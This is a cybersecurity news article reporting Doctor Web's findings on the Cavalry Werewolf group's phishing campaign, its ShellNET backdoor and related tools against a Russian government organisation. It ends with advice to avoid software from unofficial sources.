Cavalry Werewolf Hit Russian Government with New ShellNET Backdoor

Cybersecurity researchers at Doctor Web have discovered a targeted attack against a Russian government-owned organisation carried out by a hacker group known as Cavalry Werewolf.

The operation, which surfaced in July 2025, began after the organisation noticed spam emails being sent from its own corporate address, a red flag that led to an in-depth internal investigation.

Doctor Web’s researchers linked the incident to a phishing campaign that used password-protected archives posing as legitimate documents. Analysis of those files revealed an unknown new backdoor, now tracked as BackDoor.ShellNET.1.

The phishing email used in the campaign. The Russian-language screenshot was shared by Doctor Web, while the English version was translated by Hackread.com using AI.

The backdoor, as per Doctor Web’s technical report, is based on open-source Reverse-Shell-CS code. Once executed, the malware opened a reverse shell connection, allowing attackers to run commands remotely and deploy further tools.

Researchers further noted that the attackers used Windows’ built-in BITSAdmin utility to download additional payloads, including the Trojan.FileSpyNET.5 infostealer. That tool collected documents, spreadsheets, text files, and images from infected systems before uploading them to an external server. Another component, BackDoor.Tunnel.41, created a SOCKS5 tunnel for covert communication and remote control.

During the analysis, Doctor Web’s researchers also found that Cavalry Werewolf relies on open-source frameworks and custom backdoors written in C#, C++, and Golang. These tools were used for remote command execution, proxy tunnelling, stealing data, and persistence through Windows registry edits and scheduled tasks.

Many of the implants were controlled via Telegram bots, an increasingly common method for managing infected hosts while masking the attacker’s infrastructure. Doctor Web also detected trojanized versions of popular utilities like WinRAR, 7-Zip, and Visual Studio Code, which were used to launch secondary malware when opened.

Cavalry Werewolf operators gathered system and user information using standard Windows commands such as whoami, ipconfig /all, and net user. They also inspect local files and network settings to plan the next stage of their attack. The researchers believe the hackers’ goal was to collect confidential information and internal network configurations.

****Who is Cavalry Werewolf****

Cavalry Werewolf first drew attention when cybersecurity firms observed a campaign from May to August 2025 targeting Russian state agencies and large industrial firms in energy, mining and manufacturing. The group used spear-phishing emails impersonating Kyrgyz government officials, which opened the door to malware deployment and remote access.

In its past operations, the group deployed custom backdoors and proxy tools, for example, “FoalShell” and “StallionRAT,” for remote execution and data theft capabilities. Analysts also note overlaps in tools and infrastructure with other clusters such as Silent Lynx and YoroTrooper, which suggests Cavalry Werewolf may be built on earlier actor foundations or cooperating with them.

****Look Before You Leap… or Weep****

Although the origins of the Cavalry Werewolf hackers remain unknown, Doctor Web’s report concludes that the group keeps adding new tools to its toolkit, reusing old code and tweaking its malware for every new attack.

The trojanized versions of well-known programs such as WinRAR, 7-Zip, and Visual Studio Code are another disaster waiting to happen if the group shifts its focus from government networks to regular users. A single careless download could be enough to hand over full control of a system.

That’s why you should never download software from third-party websites, no matter how convincing their reviews may sound. Avoid installing games, mods, or utilities from unverified sources just for convenience. Always use official platforms, and even then, run new files through VirusTotal and your antivirus before installing.

The point isn’t to scare you, it’s to keep you secure.